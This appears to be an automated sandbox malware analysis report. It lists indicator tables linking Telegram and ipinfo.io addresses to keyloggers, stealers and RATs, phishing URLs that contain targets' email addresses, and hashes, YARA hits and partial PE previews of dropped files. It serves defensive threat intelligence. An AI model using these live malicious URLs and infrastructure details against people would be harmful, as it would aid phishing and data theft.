149.154.167.220 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Order88983273293729387293828PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | https://t.ly/-kxCO | Get hash | malicious | Braodo | Browse |
34.117.59.81 | FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | 172.104.150.66.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | VertusinstruccionesFedEX_66521.zip | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | UjbjOP.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | I9xuKI2p2B.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | licarisan_api.exe | Get hash | malicious | Icarus | Browse | ipinfo.io/ip
34.117.59.81 | build.exe | Get hash | malicious | Unknown | Browse | ipinfo.io/ip
34.117.59.81 | YjcgpfVBcm.bat | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | lePDF.cmd | Get hash | malicious | Unknown | Browse | ipinfo.io/json
34.117.59.81 | 6Mpsoq1.php.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ipinfo.io | 2h2xLB9h1L.lnk | Get hash | malicious | Abobus Obfuscator | Browse | 34.117.59.81
ipinfo.io | bose2scut18.bat | Get hash | malicious | Abobus Obfuscator | Browse | 34.117.59.81
ipinfo.io | 18cut04.bat | Get hash | malicious | Abobus Obfuscator | Browse | 34.117.59.81
ipinfo.io | bose1511mkt.bat | Get hash | malicious | Abobus Obfuscator | Browse | 34.117.59.81
ipinfo.io | https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.za | Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse | 34.117.59.81
ipinfo.io | 704b67b5-6bc9-dbd5-0710-60eb98e03983.eml | Get hash | malicious | Unknown | Browse | 34.117.59.81
ipinfo.io | OBS-Studio-30.2.3-Windows-Installer.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
ipinfo.io | https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.kr | Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse | 34.117.59.81
ipinfo.io | https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t | Get hash | malicious | HTMLPhisher | Browse | 34.117.59.81
ipinfo.io | Sara.exe.bin.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
api.telegram.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | rCEMG242598.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | Pagamento,jpg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | yF21ypxRB7.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
api.telegram.org | PayeeAdvice_HK54912_R0038704_37504.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | Order88983273293729387293828PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | download.exe | Get hash | malicious | Remcos, XWorm | Browse | 149.154.167.220
api.telegram.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Order88983273293729387293828PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
Unlock_Tool_v2.6.5.exe | malicious | Stealc, Vidar | 149.154.167.99
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
rCEMG242598.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Pagamento,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
yF21ypxRB7.exe | malicious | XWorm | 149.154.167.220
PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
download.exe | malicious | Remcos, XWorm | 149.154.167.220
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Order88983273293729387293828PDF.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Match: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.za | malicious | Outlook Phishing, HTMLPhisher | 34.117.59.81
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | Credential Flusher | 34.117.188.166
file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 34.117.188.166
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 149.154.167.220, 34.117.59.81
SOA.exe | malicious | AgentTesla | 149.154.167.220, 34.117.59.81
13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo | 149.154.167.220, 34.117.59.81
kQ3WxQb6bw.lnk | malicious | Unknown | 149.154.167.220, 34.117.59.81
36yw96m7Ni.lnk | malicious | Unknown | 149.154.167.220, 34.117.59.81
scut18bo03.bat | malicious | Abobus Obfuscator, Braodo | 149.154.167.220, 34.117.59.81
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 34.117.59.81
bose2scut18.bat | malicious | Abobus Obfuscator | 149.154.167.220, 34.117.59.81
18cut04.bat | malicious | Abobus Obfuscator | 149.154.167.220, 34.117.59.81
bose1511mkt.bat | malicious | Abobus Obfuscator | 149.154.167.220, 34.117.59.81
Match: C:\Users\user\Desktop\KlfRTWYv.log
Associated Sample Name / URL | Detection | Threat Name
T0jSGXdxX5.exe | malicious | DCRat, PureLog Stealer, zgRAT
s5duotgoYD.exe | malicious | DCRat, PureLog Stealer, zgRAT
main.exe | malicious | DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT
file_1443.exe | malicious | DCRat, PureLog Stealer, zgRAT
lsass.exe | malicious | DCRat, PureLog Stealer, zgRAT
t8xf0Y1ovi.exe | malicious | DCRat
QMT2731i8k.exe | malicious | DCRat
TGh6AUbQkh.exe | malicious | DCRat, PureLog Stealer, zgRAT
2VaAObAYLP.exe | malicious | DCRat
dvc2TBOZTh.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):425
                                                                                                                Entropy (8bit):5.843600917111957
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:0Tpr9kWLCCTjzcpvV2lYW7aaqub6QhJF7ioNVG:0NraWLxTjzcGnaaqubnUJ
                                                                                                                MD5:9C3789AEA889385FA8BA4DF3EDBBD276
                                                                                                                SHA1:7E2996401C8916FA50FC85191FB527713E316AD9
                                                                                                                SHA-256:7DC0B80B76BCAB171FD485BB3A1E7881E51614409BFD8553C323AA78F150B179
                                                                                                                SHA-512:B79E25CAC0EA1B1096092352412C91150D173B84C9FE3831B1089CA68876D3EA3631A256A9AB99CBDCFD8B5DC8297A6A9E258852E381870C5FD646F3F74BD6BB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:MSVC .res
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1168
                                                                                                                Entropy (8bit):4.448520842480604
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                                MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                                SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                                SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                                SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                                Malicious:false
Preview: MSVC resource data containing a VS_VERSION_INFO block (FileVersion 0.0.0.0, ProductVersion 0.0.0.0, Assembly Version 0.0.0.0, InternalName msedge.exe, OriginalFilename msedge.exe, empty FileDescription and LegalCopyright, Translation 0000 04b0) followed by an embedded application manifest (assemblyIdentity version="1.0.0.0" name="MyApplication.app", trustInfo / requestedPrivileges; dump truncated).
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4608
                                                                                                                Entropy (8bit):3.9013554994428823
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:6Gmtt6xZ8RxeOAkFJOcV4MKe28dpavqBHHuulB+hnqXSfbNtm:UVxvxVx9Javk5TkZzNt
                                                                                                                MD5:0F548165DDBB16E3FA4AABB0F03B7318
                                                                                                                SHA1:05E18D1B30C11E6AEE1CFF1C276A587BFA0AA117
                                                                                                                SHA-256:026B55AF9F3078D528414EA98BDC4EBE085F4B67978695F94B510D81D204FB8B
                                                                                                                SHA-512:F7A25283B5A114C2BADBC995957B551572DEB6C04A4B9E4EC2DDF39182080EBEEE30649070D63271F1F875DE105F5E20BBA0505C7A28D7F6C087CA479BD9068A
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (490), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):490
                                                                                                                Entropy (8bit):5.856004214856076
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:kflh4cSsZI+spp9nNbCLGMykZknSRYjL7dnUXaDFb0W4:ilHwp9NbCL7ZknSmUqI
                                                                                                                MD5:6463DBA329B47301B3E44296280EDA8C
                                                                                                                SHA1:FF3F062725197185AEC67F79495F5EE4A7209CC5
                                                                                                                SHA-256:36DD8BB0BEBBF2E6E0950A3BEB8C716635D141FF8F36BE922FB75BD4D4E5F4ED
                                                                                                                SHA-512:36EA86FED86B5DD904F2CBC8D3DA2DF58265E78CD974591621E7AE531B76D5AC6748F64CDDB2F4531A42C986D3B09258F62AE6E00EC67E7BD8B76344CE6F3FF0
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (319), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):319
                                                                                                                Entropy (8bit):5.794551103887065
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:DVPY1QWYg6N0BxBLlIMPCgPihYe186pA23s3thtEpaisvtVN84:DS1DQmBx96WshYexpAX3thmT+s4
                                                                                                                MD5:E20D1869DE8A5A6D7449B13B97C59C92
                                                                                                                SHA1:69290D184BECBF644CE9E78BBB1B17BA2B9E0DDA
                                                                                                                SHA-256:49D284749BB7BB78180720C7E5E543FB90BB4E8A88F0D104D64240535AA04630
                                                                                                                SHA-512:63D106931839D0B3288700D2682D24FA8A15B4FE4F227BB6A5C3B1BCAE50C28C80AA36365B8EBC2635D1D34F5A9C0EAECA184C372C582137EEB90A7D36244F0E
                                                                                                                Malicious:false
                                                                                                                Preview:LQQTxpjpdiPusmCjiy61Vfkro0BnHCEsd9XdVPtQiobglhgRGudpAr8pqjo7n5ibdhQsOjOTEqSqDEFHTugXiZsvBsxvkwmmGACEQyDhfKlTZRlldhn3ZL2EyerfwdsRDqkDCB0fr91YyYWuGLRDJsN5I7PvGhvCbTQtqijcqHMZTeQaI7ZkLoIUcp5EwEYJOz6eInDilzWBgxlnrynJHK0xL5QAnfpltCLehvRe319WRHyoERX7aPBD8JTNWD4GJuSelHG5gJQQLdfDHl6WIsLdAIfYcEH062NhzUC6LbaR9v2eoPFvGi7ajyddlrc
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):266
                                                                                                                Entropy (8bit):5.8145612008866125
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:0FdD8ReexHLEk8LXUGsDAlk6eaqCQsDq02CvwdEj82zul0h982XzA:0oPLN8jU42D+qNCabkuyh6wzA
                                                                                                                MD5:AB7ABAE77CBD9E44E612AF0AA9F2E606
                                                                                                                SHA1:1B29011B875525CF1AD2C14A2080F4D9CD7665B8
                                                                                                                SHA-256:544DF33A1780215E70320BA6B4BA03034AA36216D5CBB5A8C01A3D5C66F8D02A
                                                                                                                SHA-512:A01D38844F829EE5EBBB9B5A89BD56B2A278F7A8ED7F8F51064B8A2FA2E28F470D53AA2DDACD1A975898CC3A1960011D79FBE16A346B5C459ADEF0960C8296FA
                                                                                                                Malicious:false
                                                                                                                Preview:7Oxi9LqR3ePQAuM9WtY4w7A0jVd88QjajOqASMHXRJqTONk7Pcpq6YdAN69nrsSn4yqwDMqJmBnnRrlVvfsfk3eLvpwVMdpj0CYZgy4DwfE5uztgUo2M9xCBTfAXZU7IVExOSMy6lptFzja66PAikcjD9XGAxgobi5jqBfOIz6kUD7MuFEbJUYi2euO4FyJFBSg3At4aB1to2P9CLV5tEeHJXqLRRUCAxeTvaSuVKBIco4APuLtu2aBgKWgThmJrzs1X6Ol2lj
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:true
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1998336
                                                                                                                Entropy (8bit):7.561504801735127
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:S1cKuEoW9iN0TvOJcaCXMgg2Suqp6Nheem6Vuuean7WiOLYGhYJG9oQpyhctpnWq:wb24KbkglgVMm9OAG9oMgctpnW5yI4
                                                                                                                MD5:2D756772BC00E5778D794C107358DDF7
                                                                                                                SHA1:77229FC9CEEB137C6644A4FA3085AECABAF94EC3
                                                                                                                SHA-256:A7F4C48301AD6B01C8777427EACEB965A9E0C14D493F44D1DEA4F8D498123469
                                                                                                                SHA-512:31FAE1A50618ED221CEF3BFC72A017E8E925C3AA2BAC727040EE655D9DFF567813E91D76FECDA0478653D50B8061481447DED77939B94E1EC823C3419B68C783
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.3g.................v............... ........@.. ....................................@.................................@...K....... ............................................................................ ............... ..H............text....t... ...v.................. ..`.rsrc... ............x..............@....reloc...............|..............@..B................p.......H...........4...........0...{............................................0..........(.... ........8........E....q...M.......)...8l...(.... ....~....{....9....& ....8....(.... ....~....{r...9....& ....8....(.... ....~....{....:....& ....8z...*...0.......... ........8........E....f...=...............1...8a.......~....(X...~....(\... ....<.... ....8....r...ps....z*~....:.... ....~....{i...9....& ....8}......... ....~....{....9c...& ....8X...8.... ....~....{....:?...& ....84...~.
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                Malicious:false
                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2126
                                                                                                                Entropy (8bit):5.371983462188659
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1H1HzHKlT4vHNpYHKD:iqbYqGSI6oPtzHeqKkt1wmj1VTqZ4vtD
                                                                                                                MD5:1BD67CFCD59AB1D751AC79E730FCC39B
                                                                                                                SHA1:F2BDE903A17C7A716D955EBA328042E10418285F
                                                                                                                SHA-256:EACD23C8D5669C5D732A40218B7F3D6C9ABB0D5E782AD2EC10BB71C1CC2E8B6C
                                                                                                                SHA-512:9FF050AB37C8E572A5D185F9A9F7E2A8076D7D64FDE7D14215302DFDFB6CE530327145B47C420AAF2BBDABA7187B0DE19357AD4C294F0B9EFD5F6ADB42DE353F
                                                                                                                Malicious:true
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                                Process:C:\Recovery\ctfmon.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
